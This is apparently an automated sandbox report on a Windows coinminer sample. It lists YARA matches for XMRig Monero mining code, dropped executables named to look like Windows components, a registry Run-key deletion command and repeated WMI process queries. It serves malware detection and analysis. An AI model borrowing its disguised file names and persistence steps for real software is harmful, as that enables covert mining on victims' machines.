                  Source: 21.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 0000001F.00000002.3318375595.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: Process Memory Space: winupsecvmgr.exe PID: 7860, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,0_2_0040D4A0
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040F0B1 NtQueryVirtualMemory,0_2_0040F0B1
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,1_2_0040D4A0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_0040F0B1 NtQueryVirtualMemory,1_2_0040F0B1
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,2_2_0040D4A0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040F0B1 NtQueryVirtualMemory,2_2_0040F0B1
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeCode function: 3_2_00007FFD9BAC0F11 NtQuerySystemInformation,3_2_00007FFD9BAC0F11
                  Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF693C53F40 NtQuerySystemInformation,24_2_00007FF693C53F40
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
                  Source: C:\Users\user\Desktop\newtpp.exeFile created: C:\Windows\sysnldcvmr.exeJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040EE740_2_0040EE74
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_004040900_2_00404090
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00407B490_2_00407B49
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_004049700_2_00404970
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040A5000_2_0040A500
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00407B200_2_00407B20
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_0040EE741_2_0040EE74
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_004040901_2_00404090
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_00407B491_2_00407B49
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_004049701_2_00404970
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_0040A5001_2_0040A500
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_00407B201_2_00407B20
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040EE742_2_0040EE74
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_004040902_2_00404090
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_00407B492_2_00407B49
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_004049702_2_00404970
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040A5002_2_0040A500
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_00407B202_2_00407B20
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD52FA17_2_00007FFD9BAD52FA
                  Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF693C685C024_2_00007FF693C685C0
                  Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF693C5719024_2_00007FF693C57190
                  Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF693C63DE024_2_00007FF693C63DE0
                  Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF693C66D8024_2_00007FF693C66D80
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exe 1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1088610392.exe 1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                  Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF693C53F40 appears 34 times
                  Source: 1088610392.exe.11.drStatic PE information: Number of sections : 11 > 10
                  Source: winupsecvmgr.exe.15.drStatic PE information: Number of sections : 11 > 10
                  Source: nxmr[1].exe.11.drStatic PE information: Number of sections : 11 > 10
                  Source: 1224321169.exe.1.drStatic PE information: No import functions for PE file found
                  Source: newtpp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 31.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 31.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 31.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 21.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 21.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 21.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 0000001F.00000002.3318375595.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: Process Memory Space: winupsecvmgr.exe PID: 7860, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: classification engineClassification label: mal100.evad.mine.winEXE@44/33@1/74
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00406BC0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,0_2_00406BC0
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00406460 CoInitialize,CoCreateInstance,wsprintfW,0_2_00406460
                  Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1]Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1068:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeMutant created: \Sessions\1\BaseNamedObjects\gggghhhfccc7
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
                  Source: C:\Windows\System32\dwm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\vljmdnomkxppwbqz
                  Source: C:\Windows\sysnldcvmr.exeMutant created: \Sessions\1\BaseNamedObjects\753f85d83d
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
                  Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\1224321169.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeCommand line argument: gggghhhfccc716_2_00AF1F40
                  Source: newtpp.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
